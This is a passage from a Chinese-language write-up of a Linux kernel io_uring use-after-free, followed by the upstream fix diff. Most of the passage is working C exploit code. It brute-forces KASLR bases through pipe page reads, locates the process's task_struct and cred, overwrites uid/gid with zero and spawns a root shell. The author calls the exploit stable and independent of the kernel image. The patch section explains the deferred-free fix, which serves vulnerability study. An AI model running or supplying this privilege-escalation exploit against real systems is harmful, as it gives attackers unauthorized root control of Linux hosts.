 * (secondary_startup_64), pinning both vmemmap_base and kernel base */
for (uint64_t loop_nr = 0; 1; loop_nr++) {
if (kernel_leak > 0xffffffff81000000
&& (kernel_leak & 0xfff) < 0x100) {
kernel_base = kernel_leak & 0xfffffffffffff000;
if (loop_nr != 0) {
puts("");
}
printf(
INFO_MSG(" Leak secondary_startup_64 : ") "%lx\n",kernel_leak
);
printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
break;
}
for (int i = 0; i < 80; i++) {
putchar('\b');
}
printf(
"[No.%ld loop] Got unmatched data: %lx, keep looping...",
loop_nr,
kernel_leak
);
vmemmap_base -= KASLR_GRANULARITY;
read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40),
kern_pipe_buffer,
pipe_fd[victim_idx],
&kernel_leak,
sizeof(kernel_leak)
);
}
/* stage 4: scan physical pages for our task_struct by its comm name */
puts(" Finding task_struct of current process in kernel space ...");
prctl(PR_SET_NAME, "rat3bant");
uid = getuid();
gid = getgid();
for (int i = 0; 1; i++) {
uint64_t *comm_addr;
read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x40 * i),
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff8
);
comm_addr = memmem(buf, 0xff0, "rat3bant", 8);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-2] == comm_addr[-3])) { /* should be equal */
printf(
SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
(vmemmap_base + i * 0x40)
);
printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);
cred_kaddr = comm_addr[-2];
cred_data = (void*) (buf + (cred_kaddr & (PAGE_SIZE - 1)));
page_offset_base = cred_kaddr & KASLR_MASK;
/* brute-force page_offset_base: keep translating cred's virtual
 * address to a struct page until the page contains our uid/gid */
while (1) {
cred_kpage_addr = vmemmap_base + \
(cred_kaddr - page_offset_base) / 0x1000 * 0x40;
read_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xffe
);
if (cred_data->uid == uid
&& cred_data->gid == gid) {
printf(
SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
cred_kpage_addr
);
break;
}
page_offset_base -= KASLR_GRANULARITY;
}
break;
}
}
/* zero uid/gid in the cred page and write it back through the pipe */
puts(" Overwriting cred and granting root privilege...");
cred_data->uid = 0;
cred_data->gid = 0;
write_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff0
);
setresuid(0, 0, 0);
setresgid(0, 0, 0);
get_root_shell();
}
/* Entry point: the exploit needs no arguments, run it directly. */
int main(int argc, char **argv, char **envp)
{
    (void) argc;
    (void) argv;
    (void) envp;
    exploit();
    return EXIT_SUCCESS;
}
运行即可完成提权,非常™稳定而且不依赖于特定的内核镜像:

0x03. 漏洞修复
这个漏洞最终在 这个 commit 当中被修复,修复方式是:
- 添加了一个记录延迟释放 buffer 的链表与对应结构
- 将 buffer 释放推迟到调用
->release()
时(而非原来的即时释放),从而在 mmap()
区域销毁后才会回收这部分内存
这个修改引入了更适用的架构,而且确乎避免了 UAF 的问题,在笔者看来还是比较成功的:
diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index d3009d56af0ba3..805bb635cdf558 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -340,6 +340,9 @@ struct io_ring_ctx {
struct list_head io_buffers_cache;
+ /* deferred free list, protected by ->uring_lock */
+ struct hlist_head io_buf_list;
+
/* Keep this last, we don't need it for the fast path */
struct wait_queue_head poll_wq;
struct io_restriction restrictions;
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index e40b1143821045..3a216f0744dd66 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -325,6 +325,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
INIT_LIST_HEAD(&ctx->sqd_list);
INIT_LIST_HEAD(&ctx->cq_overflow_list);
INIT_LIST_HEAD(&ctx->io_buffers_cache);
+ INIT_HLIST_HEAD(&ctx->io_buf_list);
io_alloc_cache_init(&ctx->rsrc_node_cache, IO_NODE_ALLOC_CACHE_MAX,
sizeof(struct io_rsrc_node));
io_alloc_cache_init(&ctx->apoll_cache, IO_ALLOC_CACHE_MAX,
@@ -2950,6 +2951,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
ctx->mm_account = NULL;
}
io_rings_free(ctx);
+ io_kbuf_mmap_list_free(ctx);
percpu_ref_exit(&ctx->refs);
free_uid(ctx->user);
diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index a1e4239c7d75d1..85e680fc74ce2c 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -33,6 +33,11 @@ struct io_provide_buf {
__u16 bid;
};
+struct io_buf_free {
+ struct hlist_node list;
+ void *mem;
+};
+
static inline struct io_buffer_list *io_buffer_get_list(struct io_ring_ctx *ctx,
unsigned int bgid)
{
@@ -223,7 +228,10 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
- folio_put(virt_to_folio(bl->buf_ring));
+ /*
+ * io_kbuf_list_free() will free the page(s) at
+ * ->release() time.
+ */
bl->buf_ring = NULL;
bl->is_mmap = 0;
} else if (bl->buf_nr_pages) {
@@ -531,18 +539,28 @@ error_unpin:
return -EINVAL;
}
-static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
+static int io_alloc_pbuf_ring(struct io_ring_ctx *ctx,
+ struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
- gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
+ struct io_buf_free *ibf;
size_t ring_size;
void *ptr;
ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
- ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
+ ptr = io_mem_alloc(ring_size);
if (!ptr)
return -ENOMEM;
+ /* Allocate and store deferred free entry */
+ ibf = kmalloc(sizeof(*ibf), GFP_KERNEL_ACCOUNT);
+ if (!ibf) {
+ io_mem_free(ptr);
+ return -ENOMEM;
+ }
+ ibf->mem = ptr;
+ hlist_add_head(&ibf->list, &ctx->io_buf_list);
+
bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
@@ -599,7 +617,7 @@ int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
- ret = io_alloc_pbuf_ring(&reg, bl);
+ ret = io_alloc_pbuf_ring(ctx, &reg, bl);
if (!ret) {
bl->nr_entries = reg.ring_entries;
@@ -649,3 +667,19 @@ void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
return bl->buf_ring;
}
+
+/*
+ * Called at or after ->release(), free the mmap'ed buffers that we used
+ * for memory mapped provided buffer rings.
+ */
+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx)
+{
+ struct io_buf_free *ibf;
+ struct hlist_node *tmp;
+
+ hlist_for_each_entry_safe(ibf, tmp, &ctx->io_buf_list, list) {
+ hlist_del(&ibf->list);
+ io_mem_free(ibf->mem);
+ kfree(ibf);
+ }
+}
diff --git a/io_uring/kbuf.h b/io_uring/kbuf.h
index f2d615236b2cb9..6c7646e6057cf5 100644
--- a/io_uring/kbuf.h
+++ b/io_uring/kbuf.h
@@ -51,6 +51,8 @@ int io_provide_buffers(struct io_kiocb *req, unsigned int issue_flags);
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg);
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg);
+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx);
+
unsigned int __io_put_kbuf(struct io_kiocb *req, unsigned issue_flags);
bool io_kbuf_recycle_legacy(struct io_kiocb *req, unsigned issue_flags);